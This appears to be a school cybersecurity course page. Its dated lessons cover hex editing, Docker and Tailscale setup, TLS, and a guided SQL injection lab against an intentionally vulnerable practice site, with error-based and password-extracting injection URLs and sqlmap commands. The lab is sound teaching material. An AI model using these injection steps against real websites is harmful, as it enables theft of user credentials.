xxd -r -p input_file > output_file

Now you can convert the original file to plain text hex, edit that, then convert back to a new edited file:

xxd -p FILE.original > temp #EDIT YOUR temp FILE xxd -p -r temp > FILE.new

This is another way to modify files that have line endings you don't like, or when nano appends a newline to the end of the file.

This is not always useful on text files, but you can tell the difference between a windows line ending and a linux line ending, and even fix it!

Try fixing an image file with a bad header:

PNG files are really great, but if you change ONE bit in the header, it will not open with an image viewer.

https://en.wikipedia.org/wiki/Portable_Network_Graphics#File_header

To save you the page load:

Values (hex)	Purpose
89	Has the high bit set to detect transmission systems that do not support 8-bit data and to reduce the chance that a text file is mistakenly interpreted as a PNG, or vice versa.
50 4E 47	In ASCII, the letters PNG, allowing a person to identify the format easily if it is viewed in a text editor.
0D 0A	A DOS-style line ending (CRLF) to detect DOS-Unix line ending conversion of the data.
1A	A byte that stops display of the file under DOS when the command type has been used—the end-of-file character.
0A	A Unix-style line ending (LF) to detect Unix-DOS line ending conversion.

Section 4: Fix the PNG file

GOAL: Use the xxd command to view the png file

You should copy this file to your home directory:

~/Documents/cyber_resources/fileEdit/image.png

Fix the header and convert the hex back to a normal using the -r flag of xxd.

go back to the top of the page

2026-04-28

2026-04-28T12:00:00+00:00

2026-04-28

Do now:

reflect on this poem:

"The radiant wisdom of the morning star, a beacon of light amidst the swirling mists. -Dù Fǔ"

Dù Fǔ knew about cybersecurity and hid a flag in his poem...(no not really)

CLASSWORK/Homework:

Quick Coding Challenge: (classwork/2026-04-28/Decode.java)

Here is text that contains a flag: "晬慧筈潷彤楤彴桩獟敶敮彨慰灥渿㽽"

Hint: 16 bit encoded characters but the message is using ascii characters.

Java happens to supports 16 bit characters, not sure what would happen in c... This looks like a job for java! A char variable will be greater than 1 byte if the string is encoded with multiple bytes. This makes the charAt of the string at least two bytes, and compatible with bitwise operators. You can then typecast to char to extract the new value.

I will test by running "javac Decode.java && java Decode"

Note:

you can use the literal string "晬慧筈潷彤楤彴桩獟敶敮彨慰灥渿㽽" in your java program.
charAt() will return a 2 byte character. This actually stores both characters of the string.
Use your bitwise operations to extract HALF of that number (1 byte) so you can look at it cleanly
After you are done, place the answer in a file, and xxd that.
Place "晬慧筈潷彤楤彴桩獟敶敮彨慰灥渿㽽" in a file, and xxd it.
Find the similarity and see if your results match how the bits are aligned.

go back to the top of the page

2026-04-29

2026-04-29T12:00:00+00:00

2026-04-29

SQL

You now have an SQL module on tryhackme. We will do an activity on Friday so try to complete this before class Friday. It should be due Monday.

go back to the top of the page

2026-05-01

2026-05-01T12:00:00+00:00

2026-05-01

SQL Injection

Together the three exploits in this section will allow a hacker to look at user emails and passwords from a website that stores data in a SQL database.

Exploits in this Section

Not sanitized user input
Leaked error messages
Plaintext passwords

Lets do it

We will be hacking a website http://hack-yourself-first.com/ created by Troy Hunt.

It is an intentionally vulnerable web app for practicing web security. WARNING Do not use any real passwords or any real personal information as the site will be hacked by many people and the data rendered visible.

Students will be in groups of 2-3. Each group will have a number. You will have a fake email that uses that number e.g. group1@cyber.stuy, group2@cyber.stuy

Each group will be named cyber9XX@gmail.com or cyber10xx@gmail.com where xx is your computer number. Chooses a password, write your email and password combination on paper so you don't forget.

Groups will: Sign up for an account… using fake info here: http://hack-yourself-first.com/Account/Register

Step by step...

On the home page where it says "Cylinder layouts". Click a few buttons and see what the URL string passes to the website

    http://hack-yourself-first.com/CarsByCylinders?Cylinders=V6
    http://hack-yourself-first.com/CarsByCylinders?Cylinders=V8
    http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12

Notice that a query string Cylinders=___ is used to tell the server what to request.

It is possible the string is being used to generate a SQL query, like this:

SELECT * FROM supercar WHERE cylinders = 'V6';

We can test this by trying to trigger an error. If we can trigger a SQL syntax error, that means the query string is inserted AND we have the ability to inject SQL queries. Perhaps the "V6" is ending up between a pair of single quotes, as it should be a SQL string.

hack-yourself-first.com/CarsByCylinders?Cylinders=V6' ????? ;--

The single quote after V6 is closing the string, followed by more sql code.

Try to:

Expose a SQL injection vulnerability

Do this by inducing a SQL syntax error. Edit the URL by altering the query string and re-visiting the page.

A conspicuous error message will appear if the website does not handle errors well.

SQL tautology

Now let's inject some purposeful SQL. We'll use a SQL tautology. These are expressions that are always true because they are redundant 1 = 1 or 'x' = 'x'. When combined with logical operators OR and AND these can be used in malicious ways to negate other boolean expressions.

This page is showing the cars with a V6 cylinder layout. Let's see if we can get the page to show ALL the cars, regardless of cylinders. See if you can utilize a tautology to craft a WHERE clause that will always be true.

hack-yourself-first.com/CarsByCylinders?Cylinders=V6' ??????? ;--

Schema discovery

Navigate to this url: http://hack-yourself-first.com/CarsByCylinders?Cylinders=V6' AND 1=(SELECT * FROM foo);--

Visiting this page will tell us Invalid object name 'foo'. This is a helpful error message because it will change if we choose a name that IS a valid name!

This is running a SQL command similar to this:

SELECT * FROM supercar WHERE cylinder = 'V6' AND 1=(SELECT * FROM foo);--';

This gives an error that foo doesn't exist! (good) Let us find a way to find existing things.

What if we replace "foo" with "supercar"? The error message will be different. This is because the inner query succeeded, telling us that the "supercar" table exists. In fact it returned several rows and placed the result in the outer query and tried to compare it to 1. The error is from trying to compare a single integer to a bunch of rows. Using this method, we can brute force the rest of the table names if we wanted to (but don't do that just yet).

You can guess a bunch of values for foo and see when you get an error that isn't the same

First we'll need to find out the table name. Here are some sensible names to try:

user
users
profile
profiles
userprofile
account
accounts

Once we have the table name for our users, we can try to get some password.

See the top 1 value:

Using an inner query we can run arbitrary commands. However, we also need to visualize the result. The structure of the outer query may limit our ability to see our results. We know that the result of the inner query will get compared to the number 1. If we have multiple values, we'll get a vague error message. It doesn't actually show the results from the inner query. But what if the result of the inner query is a single value?

http://hack-yourself-first.com/CarsByCylinders?Cylinders=V6' AND 1=(SELECT TOP 1 COLUMN_NAME FROM TABLE_NAME);--

e.g.

1=(SELECT TOP 1 cylinders FROM supercar);--';

You have to guess the column names for now, but you can probably guess at least one... name, id, email, first/last name, or other common categories for a user table.

Password stealing

Let's start stealing passwords.

TOP 1 will limit the results to one row. We are also only selecting one column "cylinders". This is a single value (the string "V6") so it actually makes sense to try to compare it to the value 1! The following error message is displayed: Conversion failed when converting the nvarchar value 'V6' to data type int. It tried to convert "V6" to an integer and it actually showed us the value in the error message!

Perhaps we can do something similar with a user's password.

Craft an inner query to obtain the top 1 user's password

Hack your neighbor group!

Exchange emails (that you used to register with this app) with another group and try to obtain one another's passwords.

There are libraries dedicated to preventing this.

The main thing is to scrub input from special characters to prevet sql injections!

Furthermore, using an ORM will prevent malicious SQL injections to make it to the DB.

SQLMAP

Use SQLMap at home...

sqlmap --url http://hack-yourself-first.com/CarsByCylinders?Cylinders= --dbs -batch

sqlmap --url http://hack-yourself-first.com/CarsByCylinders?Cylinders= -D hackyourselffirst_db --tables --batch

go back to the top of the page

2026-05-04

2026-05-04T12:00:00+00:00

2026-05-04

Final Project:

Update:

You will have 2 weeks (10 school days)

Start now: Begin to choose research topics and partners. You will start the project next week, you need a partner and topic by Wednesday.

Ultimate goals:

You will research and learn about a topic.
You should develop something using an appropriate programming language: a tool, an implementation of a known algorithm, simulation, exploit etc.
You will create a 11-14 minute video to the on that cybersecurity topic and demonstrate the tool, or use it to explain the topic.
The video should teach about the purpose and importance of what it does, and demo how it works.
All materials required should be part of your repo. (Sample images, files, presentation notes/slides, etc)

If you implement existing algorithms, having a tool that already works to base yours off of is important. e.g. enigma machine / other ciphers already have online tools to use. Yours should be compatible.

You can present a new cipher (pre-computer is easy, contemporary is difficult), along with historical context, weakpoints. You would be required to make an encoder/decoder and maybe a visualizer, or a tool that can crack it when a key is missing.

You can present an existing tool / exploit. You would need to provide a way for students to test this. (tryhackme room or similar)

You can implement an image / sound stego program. Something like stegsolve maybe. For audio, something that keeps the files valid sound files but with hidden bits.

Harder: Implement a contemporary cipher (SHA/AES) preferably you can demonstrate that it is compatible with other tools

Regarding TryHackMe: You will not easily be able to make a target machine, as creating a VM is not part of the class.

Examples:

Enigma Machine visualization
Image stegonography tool to create hidden messages that are viewable in stegsolve
Cryptography TryHackMe room (without a VM)
Audio stegonography with Audacity to show the results.
Cryptography Algorithm + encoder/decoder. (homework would involve understanding what the algorithm does and using a tool)
Some custom tool for finding exploits/ automatic scanning / analyzing properties of a target.
Using existing tools, but you would have to create a challenge to use with them.
Language interpretor for an esoteric language, or code Obfuscation and Deobfuscation
A cool but patched vulnerability like "Shellshock", which may require demoing an old and vulnerable binary.
Not limited to this, you can research any topic that we touched upon.

Note:

Different groups that work on the same topics SHOULD coordinate what is being presented so as to compliment eachother's presentations.

After Final Project is due:

Once the final project deadline hits, your repos will be locked. I will then check your shared video links to ensure your video is provided.

We will watch the video presentations in class, and have a peer rating system (for fun, not grades. Like "most technically impressive" or some other categories).

Rather than have groups give work at home, I will be assigning new tryHackme rooms for learning and for challenges.

go back to the top of the page

2026-05-05

2026-05-05T12:00:00+00:00

2026-05-05

A kernel is the core, foundational component of an operating system (OS) that acts as the main interface between computer software and hardware

Docker

Docker is a platform that enables developers to build, test, and deploy applications quickly by packaging them into standardized, units called containers

Containers are lightweight, unlike Virtual Machines (VM) which require a complete system install, a container shares the host kernel.

The computer that runs the containers is called the host.

Containers can be preconfigured then deployed anywhere. There is cross platform portability.

Containers are isolated from the rest of the system, so vulnerabilities are not going to affect the neighboring containers or the host system.

Containers are lightweight (MBs), boot in seconds, and are ideal for microservices and portability.

VM are heavier (GBs), boot slower, but provide better security isolation and run different OS

Docker vs other alternatives:

A popular alternative to docker is Podman

The primary difference between Docker and Podman is their architecture:

Docker uses a centralized background service (daemon) to manage containers.
Podman is daemonless, running each container as an independent process.
Podman is rootless by design, while docker requires root.

Examples of useful containers:

game server
Web server
Databases Sql/Postgres/etc
media server (plex, jellyfin, etc.)
Pi-hole (web proxy that blocks ads)
full kali distribution on your non-kali linux machine or mac. (windows should use wsl for extra features)
Local AI processing* (Ollama, LocalAI, etc.) - keep your llm data away from companies!
Gitea (self hosted git server)
Replacement for your dependency on google tools: (libreoffice) / Drive (filecloud) / Etc.
Bitwarden private server (danger if you aren't careful)
web browser in a container. (then you connect via a remote desktop)
tool to convert questionable pdf's into safe ones

* AI workloads are not viable on potato computers. You will need faster workstations to do small AI tasks, and even expensive hardware won't compete with cloud tools.

TryHackMe Docker intro

There is a Docker intro room, please complete it by tomorrow.

go back to the top of the page

2026-05-05

2026-05-05T12:00:00+00:00

2026-05-05

Free digital ocean credits:

https://www.digitalocean.com/github-students

Creating a cloud machine (droplet on digital ocean)

I will use ubuntu 24.04

You do NOT need to make a large/fast droplet. Use the cheapest one for $5 credits/month.

Setting up docker on DO droplets

This is one way to do it:

sudo apt install docker.io docker-buildx

Base images

Alpine is a minimal set of shell tools, while scratch is a zero-overhead base.

Creating a custom docker image:

Lets make a simple custom machine.

Create a directory and place a script and dockerfile in it.

Script:

#!/bin/sh
echo "Hello, the script is running automatically!"

Lets see a simple dockerfile

# Use Alpine Linux as the small, lightweight base operating system
FROM alpine

# Set the default folder inside the container where commands will run
WORKDIR /app

# Copy the script from your computer into the container's /app folder
COPY myscript.sh .

# Grant execute permissions to the script so it can actually run
RUN chmod +x myscript.sh

# Create a new user named 'scriptuser' without a password for better security
RUN adduser -D scriptuser

# Switch from the 'root' (admin) user to 'scriptuser' for all following actions
USER scriptuser

# Tells Docker exactly which file to execute when the container starts up;
# using brackets [] ensures the script receives system signals (like "stop") correctly.
ENTRYPOINT ["./myscript.sh"]

You can then build a container image using docker build -t my-image .

Activity + Demo

Do this on your own digital ocean droplet tonight. I will demo how to do it in class.

If you forgot how to mount a volume or forward a port, please review your intro docker THM room notes.

Task 1

Run a server on your container.

Make your script run a nc server.
Make your docker run command bind an external port to your internal port
Connect your local nc to your droplet_ip:port and see if it connects.
TAKE DOWN your droplet.

create a new user

We don't want things to be run as root or make things too permissable, so we should create a user.

adduser dockeruser
usermod -aG docker dockeruser
su - dockeruser
newgrp docker

We are using some shenanigans with the first user being id 1000, and that is the default for docker... but that is okay for a test box.

Task 2

Mount a local directory on your container

make a ./data folder in your droplet. use pwd to see the full path afterwards.
when you run your container, mount a volume if your directory is /root/container/data mount it to /app/data/
Make your script write to a text file in your /app/data/ directory.
If this works, your data folder now has a file inside of it!

Task 3

Web server?

for simplicity (don't do this for deployment) comment out the user for the file creation.
Now try changing your entrypoint: ENTRYPOINT ["python3", "-m", "http.server", "80", "--directory", "/app/data"]
Map 80:80 when you run your container.
Since your container is root, you can use port 80 on the inside.

go back to the top of the page

2026-05-06

2026-05-06T12:00:00+00:00

2026-05-06

Update:

Since everyone has learned docker, you can in fact create a box to attack. This is not meant to be deployed on tryhackme, but you can include a vulnerable docker container that you can let someone try to hack into. This expands the possible things you can do in a final project including providing a containerized vulnerability, or complicated challenge.

Final Project Grade breakdown

40% - (Project) The stuff you made (Lesson/Algorithms/tools/demos, etc.)

20% - (Presentation) Video Presentation + PRESENTATION.md. The video Should be 11-14 minutes, all group members must contribute. You should not show/edit code unless your project has to do with creating/modifying code. You are expected to screen share and switch between presentation of slides/info, and your actual program.

40% - (Commits + Documentation) README , DEVLOG (updated daily), regular commits, appropriate commit messages, working over the entire duration of the project, not procrastinating, and with both members contributing sufficiently.

Next steps

With your partner(s) (groups of 2-3) by Friday have three proposals typed/printed. There should be a few options including the intent and scope of what you plan to make.
Work with your partner on branching/merging in a dummy-repo. It is assumed you know how to do this BEFORE your project starts.
More details will be provided about the formatting when you get your repositories.

You need to branch

Your main branch will be working code only. To do this you must learn branching. Learn this early so your workflow with your partner is good.

Working solo or in a group , you MUST use branches.

1. Git Branching

Branches on github are just separate copies of your code that you work on so that there are clear sections of feature development and so that other people's commits do not interfere with yours.

Make one branch per group member when working on your code. Merge your branch into main when you get to a finished feature/bugfix.

You will mostly work in your branch. If there are small changes or bugfixes, they can be done on the main, but this is discouraged.

Do not delete your branches. (The tutorial shows you how to do this.)

2. Merging

After you branch, you will edit commit and push changes as normal. After you are happy with the state of your branch you need to merge the branch into your main branch.

Note: main and master are not interchangeable. You will sometimes see "git checkout main" and "git checkout master" and they are used the same way. Master branch was the old style naming, main branch is the current style.

Your repo is probably main, but could be master if you did something wonky.

You should merge using the --no-ff flag:

    
  git checkout main
  git merge --no-ff BRANCH_NAME

3. Merge conflict

If you do everything right you will still get merge conflicts. This is normal when working with more than one person.

Example:


  $ git merge branch_to_create_merge_conflict
  Auto-merging README.md
  CONFLICT (content): Merge conflict in README.md
  Automatic merge failed; fix conflicts and then commit the result.

Now, go into the README file, as Git asks, to see what it looks like:



  This is a new README file
  <<<<<< HEAD
  This is an edit on the master branch
  ======
  This is an edit on the branch
  >>>>>> branch_to_create_merge_conflict

  <<<<<< HEAD
  This is an edit on the master branch
  ======
  This is an edit on the branch
  >>>>>> branch_to_create_merge_conflict

As you can see, Git added some syntax including seven "less than" characters, <<<<<< and seven "greater than" characters, >>>>>>, separated by seven equal signs, =======. These can be searched using your editor to quickly find where edits need to be made.

That there are two sections within this block:

The "less than" characters denote the current branch's edits (in this case, "HEAD," which is another word for your current branch), and the equal signs denote the end of the first section.

The second section is where the edits are from the attempted merge; it starts with the equal signs and ends with the "greater than" signs.

As a developer, you decide what stays and what goes.

READ carefully the edit COULD be either branch, or a combination of the two depending what the code is doing:


    This is a new README file
    This is an edit on the branch

Make your edits as necessary, then save the file.


  $ git status
  On branch master
  You have unmerged paths.
  (fix conflicts and run "git commit")
  (use "git merge --abort" to abort the merge)

  Unmerged paths:
  (use "git add ..." to mark resolution)
  both modified: README.md
  no changes added to commit (use "git add" and/or "git commit -a")

Follow the directions to add the file and then commit:

 
  $ git add README.md
  $ git status
  On branch master
  All conflicts fixed but you are still merging.
  (use "git commit" to conclude merge)

  Changes to be committed:
  modified: README.md

  $ git commit
  [master 9937ca4] Merge branch 'branch_to_create_merge_conflict'

4. Tutorials:

You can check out 2 examples on branching and merging:

Finally here is a cool interactive tutorial: (first three steps are what you need) https://learngitbranching.js.org/

URGENT: Read the notes above the tutorials again after you try the tutorials!

go back to the top of the page

2026-05-20

2026-05-20T12:00:00+00:00

2026-05-20

Guidelines:

Commits

Please make sure you commit your work every day. When writing code, commit much more frequently. You have mandated class time, AND homework time to work on this daily. Your efforts should reflect this. Weekends you have flex time I do not care when you work as long as you do.

To make things easier for all parties involved, here are some more clear documentation requrements.

Your repository should contain the following.

README.md
1. This is your landing page for the rep with your project description.
2. Directions on how to use/access all parts of the project (including compilation steps + library installation)
3. Link to the PRESENTATION VIDEO + PRESENTATION.md files.
4. A complete list of references and resoures you used.
PROPOSAL.md
1. Expand on your accepted proposal and include some information about your specific goals.
2. There is a stub file you can fill in the details. The purpose of this is to let me know precisely what you plan on producing: programs, lessons, challenge, etc.
DEVLOG-YOUR_NAME.md
1. A per person daily log of what you did at home + in class.
2. You must update this daily to reflect what you did. DO NOT keep a separate log and copy it over at the end.
3. You may edit this on the main branch.
PRESENTATION.md : Create your presentation/lesson "slides". This should include all of the info from your presentation. You SHOULD NOT just read the slides, but the slides should contain enough information such that if you didn't watch the video, you would learn most of it.
DO NOT make a powerpoint or other slide deck like thing, it is flashy at the expense of content.
subdirectories : Place any code/scripts that you write in appropriate sub directories.

Note: You must use appropriate git markdown for formatting of your md files. Headers, links, code snippet highlights, etc.

Video Presentation

There are many benefits to a video rather than live presentation. We won't have to worry about absent group memebers, or total presentation technical failure!

This should be 11-14 minutes long, and should include all members of the group in addition to some screen share of what you made + your presentation.md.

You will upload the video to google drive, and provide a link in your repo's documentaion. Make sure that you share with my stuy.edu and schools.nyc email. (You might have to upload to your stuy.edu drive to share to both.)

One suggested way to create this video is to record a zoom meeting, this way you can share screen and have all presenter's faces/voices/etc.

Final Project Repos

Group Names: XY-LastName-FirstName-LastName-FirstName

e.g. 09-Kim-Yoosung-Rivia-Geralt

https://classroom.github.com/a/B2vtqcJe go back to the top of the page

2026-06-01

2026-06-01T12:00:00+00:00

2026-06-01

Tailscale

Requirements:

You will need a (digital ocean) machine you have root access in order to deploy docker containers to replicate the demo. If you didn't get that sorted out, you had over a month. Get sorted!

You want to run services?

Mind your security.

Every open port is an entry point that scanners (Shodan, etc.) will find within minutes of exposure
Unpatched software vulnerabilities can be exploited automatically by bots
APIs and admin panels exposed publicly are constantly probed for default credentials
Brute-force and credential stuffing attacks run 24/7 against any login page
Many self-hosted apps have weak or optional authentication by default
A single compromised credential can expose everything behind it
Dependencies (libraries, base images) introduce vulnerabilities outside your control
Misconfigurations (open registries, world-readable storage, debug modes left on) are extremely common

How can you access your services securely?

Generally running a vpn is a good way to get around exposing your applications to the internet.

However a vpn is also a publicly accessible server! This is another service to worry about that must be patched and maintained to avoid being compromised.

Alternative: just cry... or use a different tool.

Tailscale is a zero-config VPN built on top of WireGuard (a modern, audited, cryptographically strong VPN protocol).

Rather than replacing WireGuard, Tailscale wraps it with an automated controls that handle all the hard parts: key distribution, NAT traversal, and device authentication.

Tailscale is proprietary!

If you wish to have an open source Drop-in Tailscale Alternative: you can try Headscale. Headscale is an open-source, self-hosted replacement for Tailscale's coordination server

My setup:

I will ssh onto a private machine and run two containers.

These containers will run very simple html pages with nginx web server.

I will make the containers use docker sidecars to connect them to my tailnet.

I will block all open ports on one of them to show how you can use a tailnet to access your services more easily, or to protect your services from clients not on the tailnet.

docker-compose.yaml

services:
  tailscale: #this is a container to go along with the web server.
    image: tailscale/tailscale:latest
    container_name: tailscale
    hostname: test-node
    env_file:
      - .env
    ports:
      - "8081:80"
    volumes:
      - tailscale-state:/var/lib/tailscale
      - /dev/net/tun:/dev/net/tun
    cap_add:
      - NET_ADMIN
      - NET_RAW
    restart: unless-stopped

  web:
    image: nginx:alpine
    container_name: web
    network_mode: "service:tailscale"

    volumes:
      - ./html1:/usr/share/nginx/html
      - ./nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - tailscale
    restart: unless-stopped
volumes:
  tailscale-state:

Also need a .env file

TS_AUTHKEY=tskey-auth-????
TS_STATE_DIR=/var/lib/tailscale

What can tailscale do?

lets have a 2nd machine on our tailnet.

services:

  # --- Stack 1 ---
  tailscale:
    image: tailscale/tailscale:latest
    container_name: tailscale
    hostname: test-node
    env_file:
      - .env
    ports:
      - "8081:80"
    volumes:
      - tailscale-state:/var/lib/tailscale
      - /dev/net/tun:/dev/net/tun
    cap_add:
      - NET_ADMIN
      - NET_RAW
    restart: unless-stopped

  web:
    image: nginx:alpine
    container_name: web
    network_mode: "service:tailscale"
    volumes:
      - ./html1:/usr/share/nginx/html
      - ./nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - tailscale
    restart: unless-stopped

  # --- Stack 2 ---
  tailscale2:
    image: tailscale/tailscale:latest
    container_name: tailscale2
    hostname: test-node-2
    env_file:
      - .env
    ports:
      - "8082:80"
    volumes:
      - tailscale2-state:/var/lib/tailscale
      - /dev/net/tun:/dev/net/tun
    cap_add:
      - NET_ADMIN
      - NET_RAW
    restart: unless-stopped

  web2:
    image: nginx:alpine
    container_name: web2
    network_mode: "service:tailscale2"
    volumes:
      - ./html2:/usr/share/nginx/html
      - ./nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - tailscale2
    restart: unless-stopped

volumes:
  tailscale-state:
  tailscale2-state:

Alternatives to full access

You can grant your tailscale network access to ports:

ports:
  - "192.168.1.100:8081:80"  # only accept connections from this interface
  - "100.x.x.x:8081:80"     # tailscale interface only

Goals:

Set up tailscale on your home device(can be on WSL).
Set up tailscale on your phone.
Verify the devices are on your tailscale.com admin page.
Set up ssh server on your home device. (can be on WSL but must be on the same device as your tailscale device)
Set up an ssh client on your phone. E.g. https://termius.com/
You can now ssh onto your personal device from your phone without having to worry about port forwarding.
Note: You have to use your data, not the school wifi for this

go back to the top of the page

2026-06-02

2026-06-02T12:00:00+00:00

2026-06-02

Goals:

Design a ssh-able docker container.

We can use a linuxserver image and put sensitive information in a .env file as follows.

docker-compose.yaml

Update: the file was changed to: "${HOST_PORT}:2222" because the ssh server listens on 2222 by default. When I tested this, I had changed the port in some default settings and didn't realize that.

services:
  ssh-workspace:
    image: lscr.io/linuxserver/openssh-server:latest
    container_name: ssh-workspace
    environment:
      - PUID=1000
      - PGID=1000
      - USER_NAME=${SSH_USER}
      - PASSWORD_ACCESS=true
      - USER_PASSWORD=${SSH_PASSWORD} # Pulls from the .env file
      - PACKAGES=curl,wget,git,tmux,vim,htop
    volumes:
      - ssh-config:/config
    ports:
      - "${HOST_PORT}:2222"             # Pulls from the .env file
    restart: unless-stopped

volumes:
  ssh-config:

And the .env:

# SSH Account Configuration
SSH_USER=appuser
SSH_PASSWORD=UserPassword123

# System Configuration
HOST_PORT=2222

Add a tailscale sidecar to it.

You must find a token on your tailscale account. To generate a key to use in your .env file go to Admin-panel -> Settings -> Keys -> Auth keys

I am not giving you the complete docker-compose but i will give some hints:

docker-compose.yaml should have variables in the .env file. The ENV file SHOULD HAVE your tailscale hostname as well!

And the .env:

# SSH Account Configuration
SSH_USER=appuser
SSH_PASSWORD=UserPassword123

# System Configuration
HOST_PORT=2222

# Tailscale Configuration
TAILSCALE_AUTHKEY=tskey-auth-YOUR_ACTUAL_KEY_HERE
TAILSCALE_HOSTNAME=secure-ssh-box

Make two of these containers.

Duplicate the container and change the hostname/tailscale name. The second container should not open a port!

Restrict access.

By not binding a port to the host you cannot ssh from anywhere except your tailnet on this box.

But WAIT! What if your tailnet has many things on it and you want to restrict it further?

Restrict access so that you must ssh onto container1 in order to ssh onto container 2. This can be done using tailscale ACLs.

RESEARCH: You must research how to add isolation rules to your tailnet using acls. Apply a filter so that ONLY your 1st machine can ssh onto your 2nd machine, nobody else. This is non-trivial, spend some time reading after you get the rest of this assignment working.

To get credit:

You will log into your DO control panel and show your droplet.
You will log into your tailscale control panel and show your connected machines.
You will show that this droplet has 2 docker containers running.
You will show the docker-compose.yaml, and docker compose down, then docker compose up -d
You will ssh onto box1 from your DO-host. then ssh into your 2nd container using the tailscale name.
You will show that your tailnet blocks every other system from ssh'ing into your 2nd container.

go back to the top of the page

2026-06-05

2026-06-05T12:00:00+00:00

2026-06-05

Have your Docker-Tailscale assignment ready to show off on Monday.

Verify you have a valid tailscale admin configuration to block/allow things getting to your 2nd host. Do this before Monday.

go back to the top of the page

2026-06-11

2026-06-11T12:00:00+00:00

2026-06-11

How TLS and Certificate Authorities Work

A simplified explanation of public/private key encryption, man-in-the-middle attacks, and how Certificate Authorities (CAs) establish trust.

1. Public/Private Key Exchange

Think of a public key like an open padlock, and a private key like the only key that can open it.

If Bob wants to send Alice a secure message:

Alice shares her public key — she gives it to anyone. It's not secret.
Bob encrypts the message — he uses Alice's public key (the padlock) to lock the message.
Alice decrypts the message — only her private key can open it.

┌─────────┐                        ┌─────────┐
│ Bob     │                        │ Alice   │
└────┬────┘                        └────┬────┘
     │                                  │
     │ 1. "Send me your public key"     │
     │ ───────────────────────────────► │
     │                                  │
     │ 2. Alice's Public Key            │
     │ ◄─────────────────────────────── │
     │                                  │
     │ 3. Encrypt message with key      │
     │ ───────────────────────────────► │
     │                                  │
     │ 4. Decrypt with private key      │
     │                                  │

Key point: Even if someone intercepts the message in transit, they cannot read it because they lack Alice's private key.

This works perfectly—assuming Bob actually has Alice's public key.

2. The Man-in-the-Middle (MITM) Attack

The security relies on Bob having the correct public key.

If an attacker (Mallory) sits between Bob and Alice, she can trick Bob:

Bob asks for Alice's public key.
Mallory intercepts and sends her own public key instead.
Bob thinks he is encrypting for Alice, but encrypts for Mallory.
Mallory decrypts, reads, re-encrypts with Alice's key, and forwards.

┌─────────┐           ┌─────────┐     ┌─────────┐
│ Bob     │           │ Mallory │     │ Alice   │
└────┬────┘           │ (MITM)  │     └────┬────┘
     │                └────┬────┘          │
     │                     │               │
     │ "Public key?"       │               │
     │   ─────────────────►│               │
     │                     │               │
     │       Mallory's key │               │
     │   ◄─────────────────│               │
     │         (pretending │               │
     │       it's Alice's) │               │
     │                     │               │
     │       Encrypted msg │               │
     │   ─────────────────►│               │
     │                     │Decrypt & read │
     │                     │ Re-encrypt    │
     │                     │ ─────────────►│
     │                     │               │

Bob and Alice have no idea this happened. Encryption worked, but privacy failed because Bob trusted the wrong key.

3. How a Certificate Authority (CA) Fixes This

A CA solves the trust problem by vouching for identities.

What is a Certificate? How do you get one?

Instead of just sending a public key, Alice registers her site with Certificate Authority is a trusted organization that verifies identities and issues digital certificates. They confirm you are who you say you are, and issue a document that others can trust.

The CA takes the contents of the certificate (Alice's identity and public key) and runs them through Public/Private key encryption. The trick here, is that their DECRYPTION key is public. Only they can create a certificate.

Now when someone connects to Alice she sends that certificate:

  ┌───────────────────────────────────┐
  │ CERTIFICATE                       │
  ├───────────────────────────────────┤
  │ Identity: alice.com               │
  │ Public Key: [Alice's Public Key]  │
  │ Signature:  [Encrypted by CA]     │
  └───────────────────────────────────┘

This certificate is decrypted using the CA's public DECRYPTION key. A MITM could not create the cert, they can only verify certs by decrypting.

Since only a CA can create this file, you can be certain that you are connected to Alice, and not a MITM.

How It Works

Step	Action
Pre-trust	Your browser comes with the CA's public key pre-installed.
Verification	Before signing, the CA confirms Alice actually owns `alice.com`.
Signing	The CA uses its private key to sign Alice's certificate.
Validation	Bob's browser uses the CA's public key to verify the signature.

If the signature is valid, Bob knows: "The CA confirms this public key belongs to Alice."

WAIT! Where does Bob get the public key from? Can't the MITM just send the wrong one?!?!?!

Browsers have some certificates pre-installed, but they also rely on root certificate stores maintained by browser vendors and operating system vendors. These pre-installed root certificates are the trust anchors that anchor the entire PKI (Public Key Infrastructure) system.

The browser doesn't directly trust a server's certificate. Instead, it trusts a small set of root Certificate Authorities (CAs), and then verifies that the server's certificate chains back to one of those trusted roots.

Why the MITM Fails Now

If Mallory tries the same attack:

Bob requests Alice's certificate.
Mallory intercepts and sends her own certificate (mallory.com).
Bob's browser checks:
- Signature is valid ✓
- BUT name (mallory.com) doesn't match alice.com ✗
Browser shows a WARNING.

Mallory cannot forge a certificate for alice.com because the CA won't sign it without proof of ownership.

  ┌─────────┐                        ┌─────────┐
  │ Bob     │                        │ Alice   │
  └────┬────┘                        └────┬────┘
       │                                  │
       │  1. "Show me your certificate"   │
       │ ───────────────────────────────► │
       │                                  │
       │  2. Certificate                  │
       │     (Public Key + Identity +     │
       │      CA Signature)               │
       │ ◄─────────────────────────────── │
       │                                  │
       │  3. Verify CA signature,         │
       │     extract key, encrypt msg     │
       │ ───────────────────────────────► │
       │                                  │
       │  4. Decrypt with private key     │
       │                                  │

What changed in this flow:

Step 1: Bob's browser asks for proof of identity, not just a key.

Step 2: Alice sends her Certificate. Because it contains a CA signature, an attacker cannot modify it or swap out the public key without invalidating the signature.

Step 3: This is the critical addition. Before encrypting anything, Bob's browser checks the CA signature using the pre-installed root keys. If the signature proves valid and the identity matchesalice.com, Bob extracts the public key from inside the certificate and uses it to encrypt the message.

This transitions to a faster algorithm: a stream cipher!

Since stream ciphers are much faster, we only use the public/private key pairs for the handshake. We then use a stream cipher key for the rest of the data.

In older TLS versions, the client generated the symmetric key and sent it to the server encrypted with the server's public key.

The problem: If an attacker records the session and later compromises the server's private key, they can decrypt the Pre-Master Secret and derive the session key. This is why RSA key exchange is deprecated in TLS 1.3.

The modern TLS 1.3 uses a Diffie-Hellman (ECDHE) key exchange. Both parties contribute to the key. Neither side "sends" the key itself; they send mathematical parameters that allow them to calculate the same result.

This provides Forward Secrecy: if the server's private key is leaked later, past sessions cannot be decrypted because the session key was never stored or transmitted.

I am not teaching the full steps for this, it is a dedicated lesson that we just don't have time for.

Classwork:

1. Discuss with your nighbors any points in the reading that you are unsure of. If you cannot agree, use your google-fu to set the record straight.

2. In your classwork_repo/09-TLS.txt write a response to the following:

You are a security engineer at a small company. A colleague asks you: "When I visit bank.com, how does my browser know it's actually the bank and not an attacker? And why can't an attacker just create their own certificate forbank.com?"

